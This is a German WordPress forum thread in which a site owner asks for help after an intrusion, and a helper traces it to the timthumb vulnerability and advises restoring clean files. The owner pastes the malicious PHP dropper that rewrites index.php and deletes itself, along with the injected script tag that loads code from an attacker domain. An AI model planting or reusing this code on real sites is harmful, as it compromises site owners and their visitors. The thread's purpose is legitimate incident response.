1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Fremdes Script auf meiner Seite?

Dieses Thema im Forum "Allgemeines" wurde erstellt von d4chs, 6. August 2011.

  1. d4chs

    d4chs New Member

    Registriert seit:
    30. Juni 2011
    Beiträge:
    3
    Zustimmungen:
    0
    Hallo,

    seid ein paar Stunden läuft auf meiner Seite ein Script, welches ich nicht selbst installiert habe. Zumindest war es gestern noch nicht vorhanden und ich habe nichts neues dazugenommen.

    Das Script heisst

    "138aab288c363726990120413c62acee.php", befindet sich im /wp-content Ordner und sieht folgendermassen aus:

    <?php
    $file = __FILE__;
    $pos = strpos($file,'wp-content');
    $dir = substr($file,0,$pos);
    $index = file_get_contents($dir.'index.php');
    $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
    $f = fopen($dir.'index.php',"w");
    fputs($f,$index);
    fclose($f);
    echo 'OK';
    unlink($file);
    ?>

    Ich benutze Firefox mit NoScript und habe es erst dadurch gemerkt, da das Script durch NoScript geblockt wurde.


    edit: Ich habe den o.a. File gelöscht und das Script taucht immernoch auf. In der index.php habe ich dieses gefunden:



    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    echo'<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>



    edit²: Ich habe nun eine ältere, cleane index.php Version eines Backups auf den Server geladen und das Problem ist verschwunden.



    edit³: Ich mache gerade ein Backup meiner Serverdaten und Avira AntiVir meldet folgendes:

    Die Datei 'D:\~...\wp-admin\common.php'
    enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].

    Die Datei 'D:\~...\wp-admin\js\config.php'
    enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].



    Reicht es wenn ich die betroffenen Dateien vom Server lösche? Wie kommen diese Files auf meinen Server? Über Hilfe wäre ich dankbar!



    Vielen Dank im voraus,

    Grüße Jörn.
     
    #1 d4chs, 6. August 2011
    Zuletzt bearbeitet: 6. August 2011
  2. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.361
    Zustimmungen:
    589
    Die Dateien, die du jetzt sicherst - kannst du nicht mehr vertrauen. Verwende die Dateien und Scripte, die vor dem erfolgreichen Angriff verwendet wurden.

    lösches *alles* und verwende eine saubere Version.

    Die Frage solltest du zuerst beantworten. Da hast zurzeit eine Sicherheitslücke mit der fremde Dateien auf deinem Server *erstellen* und somit auch *verändern* können.

    Evlt. verwendest du timthumb

    http://blog.wordpress-deutschland.org/2011/08/03/sicherheitsluecke-in-vielen-themes-durch-timthumb.html

    Viel Glück

    ralf
     
    #2 r23, 6. August 2011
  3. d4chs

    d4chs New Member

    Registriert seit:
    30. Juni 2011
    Beiträge:
    3
    Zustimmungen:
    0
    #3 d4chs, 7. August 2011
  4. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.361
    Zustimmungen:
    589
    Du solltest die Sicherheitslücke suchen. D.h. die Log Files vom WebServer auf merkwürdigkeiten untersuchen.

    http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Wordpress

    Du solltest dir meiner Meinung nach Anleitungen für die Absicherung von Wordpress besorgen

    z.b.
    So sichern Sie die Blog-Maschine ab


    http://www.spiegel.de/netzwelt/web/0,1518,707286,00.html
    Evtl. hast du ja einen Fehler bei der Installation gemacht?


    Du solltest den Dateien auf deinem Server nicht mehr trauen. Wenn du keine Werkzeuge hast, ist meiner Meinung nach die Löschung von alten Dateien sinnvoll.

    Viel glück

    ralf
     
    #4 r23, 8. August 2011
  5. d4chs

    d4chs New Member

    Registriert seit:
    30. Juni 2011
    Beiträge:
    3
    Zustimmungen:
    0
    Danke für die Links! Es war tatsächlich doch timthumb.php, wie Du in Deinem ersten Posting schon richtig vermutet hattest.

    Die .php-Datei wurde von dem

    "igit-related-posts-with-thumb-images-after-posts"

    Plugin benutzt.

    Ich habe nun die geupdatete timthumb in den Plugin-Ordner geladen, das Plugin funktioniert aber jetzt nicht mehr.

    Da ich endlich die Sicherheitslücke gefunden habe, werde ich alle Dateien austauschen, die beim Update auf 3.2.1 nicht erneuert wurden.

    Vielen Dank nochmal für deine Hilfe!
     
    #5 d4chs, 8. August 2011
(Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können. )
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden